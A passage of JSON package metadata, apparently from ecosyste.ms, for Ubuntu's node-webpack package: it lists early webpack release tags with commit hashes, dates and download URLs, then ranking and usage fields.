github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T04:11:14.513Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-22.04\u0026repository_url=https://launchpad.net/ubuntu/jammy","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https:/